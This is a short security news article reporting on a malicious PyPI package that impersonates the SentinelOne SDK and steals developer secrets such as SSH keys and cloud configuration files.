HQ/EMEAFind out how we can help your business
Hackers have developed a compromised Python package on PyPI dubbed SentinelOne. This malicious PyPI package spoofs a legitimate SDK client for a trusted American cybersecurity company, resulting in data harvesting.
The malicious package provides standard features, quickly accessing the SentinelOne API in another project. However, the threat actors trojanised the package to collect critical data from infected developer systems.
The researchers who discovered the malicious package confirmed its hostility and reported it to PyPI and SentinelOne, allowing the SentinelOne admins to remove the compromised package.
The hackers deployed the Python package in SentinelOne earlier this month.
The malicious Python package on Sentinel one was uploaded by the hackers to PyPI on the first week of this month and has been updated numerous times since then. Researchers claimed that the compromised package is a copy of the legitimate SentinelOne SDK python client.
In addition, the threat actors run several updates to improve and patch the malicious features of the package.
More analysis revealed that the fake SentinelOne package includes api[.]py file with malicious code that harvests and uploads data to an IP address that does not belong to SentinelOne’s infrastructure.
The malicious code behaves like an infostealing malware that exports various developer-related information from all the home directories on the infected device. This data contains Zsh and Bash histories, host files, SSH keys, AWS configuration info, Kube configuration info, [.]gitconfig files, and more.
Researchers also believed that the threat actors target developer infrastructures to gain further access to their cloud servers and services since these folders commonly include auth tokens, API keys, and secrets.
Some analysts also found early variants of the malicious package had difficulty operating the data collection module on Linux systems. However, the package authors fixed their tool on newer versions.
Based on reports, the same authors uploaded another five identically named packages from December 8 to 11 this year.
All the published versions of the infection infostealing malware package have been downloaded by different users thousands of times on PyPI. Researchers have yet to confirm whether the malicious package has been used in cyberattacks.
